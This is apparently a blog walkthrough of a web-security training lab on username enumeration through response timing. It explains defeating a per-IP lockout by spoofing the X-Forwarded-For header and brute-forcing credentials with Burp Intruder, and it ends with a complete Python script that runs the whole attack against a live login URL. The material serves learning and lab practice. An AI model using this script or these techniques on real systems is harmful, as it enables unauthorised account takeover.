Daemon Of Hacking

Username enumeration via response timing


Last updated 6 months ago


Lab Description

Walkthrough

Step 1: Initial Observations

  • Upon visiting the login page, entering arbitrary credentials results in a rate-limiting error after multiple failed attempts, stating that you must wait 30 minutes.

  • This indicates brute-force protection is enabled.

Step 2: Capturing and Analyzing the Login Request

  1. Use Burp Suite to intercept the login request with arbitrary credentials such as test:test.

  2. The intercepted request contains two key parameters:

    • Username: The entered username.

    • Password: The entered password.

  3. Send this intercepted request to Intruder for automation.

Step 3: Bypassing Rate Limiting

  • The lab hint points at the X-Forwarded-For header: the application counts failed attempts per client IP address, and it takes that address from this header rather than from the underlying connection.

  • Add an X-Forwarded-For header to the request with a different value on every attempt, and confirm that the "wait 30 minutes" lockout no longer appears.

The X-Forwarded-For header is set by reverse proxies to carry the original client address through to the back-end. Here the application reads it straight from the request, so any client can supply whatever value it likes. Sending a unique X-Forwarded-For value with each request makes every attempt look like it comes from a new client, the per-IP counter never reaches the lockout threshold, and the brute-force can continue without restriction.

Step 4: Exploiting Timing Differences

The lab leverages a timing-based username enumeration vulnerability:

  • For a valid username, the server finds the account and then hashes the submitted password to compare it with the stored hash; the hashing is the expensive part of the request.

  • For an invalid username, the server rejects the request as soon as the account lookup fails, without hashing anything.

Both outcomes return the same generic error message, so the response body gives nothing away; the response time does. You can read further about hashes at Passwords & Attacks.

Step 5: Configuring Burp Intruder

  1. Mark Payload Positions:

    • Mark the X-Forwarded-For value and the username parameter as payload positions.

    • Set the password to a long string (a few hundred characters): the server hashes the password only for valid usernames and the cost grows with its length, so a longer password widens the timing gap between valid and invalid usernames and lifts it clear of network jitter.

  2. Set Payload Sets:

    • Payload Set 1 (X-Forwarded-For): sequential numbers (or IP addresses), so every request carries a distinct value and no single spoofed address reaches the lockout threshold.

    • Payload Set 2 (Username): Use the provided wordlist of usernames.

  3. Attack Type:

    • Select Pitchfork. It steps through both payload lists in lockstep, so request N sends username N from spoofed address N; Cluster bomb would instead send every username from every address and multiply the requests for nothing.

Step 6: Analyzing the Results

  • After executing the attack, compare the response times for each username. In the Intruder results table, add the "Response received" and "Response completed" columns (Columns menu) and sort by one of them; the default view shows only status and length.

  • The username with a noticeably longer response time than all the others is a valid username. If one run is ambiguous because of network jitter, repeat the attack with a fresh number range for X-Forwarded-For and keep the name that is consistently slowest.

Step 7: Brute-Forcing the Password

  1. Update the request in Burp Suite with the identified valid username.

  2. Mark the password parameter as a payload position, and keep X-Forwarded-For as a second position with a fresh number range: the per-IP lockout still applies, so the password attack also needs Pitchfork with a unique value per request.

  3. Load the provided password wordlist into Intruder.

Start the attack and observe the results.

  • Failed attempts return a 200 response with the login page; the one request that returns 302 Found (a redirect to the account page) holds the correct password.
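Steps 3 to 7 as a script, added here as an example; it is not code from the lab, from PortSwigger or from this writeup. It rotates X-Forwarded-For on every request, times each candidate username with a long probe password, accepts the slowest name only when it is clearly slower than the median of the rest, then brute-forces that user's password watching for the 302. The login path /login, the 10.0.x.y spoofed addresses, the wordlists and credentials, and the fake server's timings and 429 lockout are all assumptions or constructed data so the script runs offline; make_http_sender is the real sender to point at a target.

```python
"""Timing-based username enumeration, then a password brute-force, both rotating
X-Forwarded-For so a per-IP lockout never triggers. `send(username, password, xff)`
is the only thing that touches a target: make_http_sender is real (urllib),
make_fake_server is a constructed offline stand-in so the script runs without a lab."""
import random
import statistics
import time
import urllib.error
import urllib.parse
import urllib.request
from collections import defaultdict
from typing import Callable, Iterator, List, Optional, Tuple

Sender = Callable[[str, str, str], Tuple[int, float]]  # -> (HTTP status, seconds)
LOGIN_PATH = "/login"  # assumption: lab-style form with username/password fields
PER_IP_LIMIT = 3       # failed attempts per IP before the lockout seen in Step 1

def xff_addresses(start: int = 1) -> Iterator[str]:
    """Yield a different spoofable client address (10.0.x.y) for every request."""
    n = start
    while True:
        yield f"10.0.{(n >> 8) & 0xFF}.{n & 0xFF}"
        n += 1

class NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # surface the 302 as an HTTPError instead of following it

def make_http_sender(base_url: str, timeout: float = 10.0) -> Sender:
    """Real sender: POST the login form with a spoofed X-Forwarded-For and time it."""
    opener = urllib.request.build_opener(NoRedirect())

    def send(username: str, password: str, xff: str) -> Tuple[int, float]:
        body = urllib.parse.urlencode({"username": username, "password": password}).encode()
        req = urllib.request.Request(base_url + LOGIN_PATH, data=body, method="POST")
        req.add_header("Content-Type", "application/x-www-form-urlencoded")
        req.add_header("X-Forwarded-For", xff)
        t0 = time.perf_counter()
        try:
            with opener.open(req, timeout=timeout) as resp:
                status = resp.status
        except urllib.error.HTTPError as err:  # the unfollowed 302 lands here
            status = err.code
        return status, time.perf_counter() - t0
    return send

def make_fake_server(valid_user: str, valid_password: str, seed: int = 7) -> Sender:
    """Constructed stand-in: hash cost only for a valid user, 302 on the right
    password, 429 once one IP exceeds PER_IP_LIMIT attempts. Nothing sleeps."""
    rng, attempts = random.Random(seed), defaultdict(int)

    def send(username: str, password: str, xff: str) -> Tuple[int, float]:
        attempts[xff] += 1
        if attempts[xff] > PER_IP_LIMIT:
            return 429, 0.005                      # "wait 30 minutes"
        elapsed = 0.020 + rng.uniform(0.0, 0.010)  # baseline plus jitter
        if username == valid_user:
            elapsed += 0.002 * len(password)       # hash cost grows with input length
            if password == valid_password:
                return 302, elapsed
        return 200, elapsed                        # same error page either way
    return send

def enumerate_by_timing(usernames: List[str], send: Sender, samples: int = 3,
                        probe_password: str = "A" * 100) -> List[Tuple[str, float]]:
    """Return (username, median seconds) slowest first, using a fresh IP per request."""
    ips, timings = xff_addresses(), []
    for user in usernames:
        elapsed = [send(user, probe_password, next(ips))[1] for _ in range(samples)]
        timings.append((user, statistics.median(elapsed)))  # median shrugs off one stall
    return sorted(timings, key=lambda t: t[1], reverse=True)

def pick_outlier(timings: List[Tuple[str, float]], factor: float = 2.0) -> Optional[str]:
    """Accept the slowest candidate only if it is clearly slower than the rest."""
    if len(timings) < 2:
        return None
    baseline = statistics.median(t for _, t in timings[1:])
    return timings[0][0] if timings[0][1] > baseline * factor else None

def brute_force_password(username: str, passwords: List[str], send: Sender) -> Optional[str]:
    """Try each candidate from its own spoofed IP; a 302 means the login succeeded."""
    ips = xff_addresses(start=1_000_000)  # disjoint from the enumeration addresses
    for pw in passwords:
        status, _ = send(username, pw, next(ips))
        if status == 429:
            raise RuntimeError("locked out: the X-Forwarded-For bypass is not working")
        if status == 302:
            return pw
    return None

if __name__ == "__main__":
    send = make_fake_server("alice", "hunter2")  # constructed; use make_http_sender(URL) live
    ranked = enumerate_by_timing(["admin", "root", "alice", "guest", "test"], send)
    user = pick_outlier(ranked)
    print("slowest first:", ranked, "\nvalid username:", user)
    if user:
        print("password:", brute_force_password(user, ["123456", "hunter2", "qwerty"], send))
```

The median over several samples per username is what Burp's single-pass Intruder run does not give you, and it is what keeps one slow network round-trip from masquerading as a valid account. The script stops on the first 429 during the password phase on purpose: that status means the spoofed header is no longer being honoured, and continuing would only burn the remaining wordlist into a locked account.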

Step 8: Validating the Results

  • Use the identified valid username and password to log into the application.

  • Access the account page to confirm successful exploitation.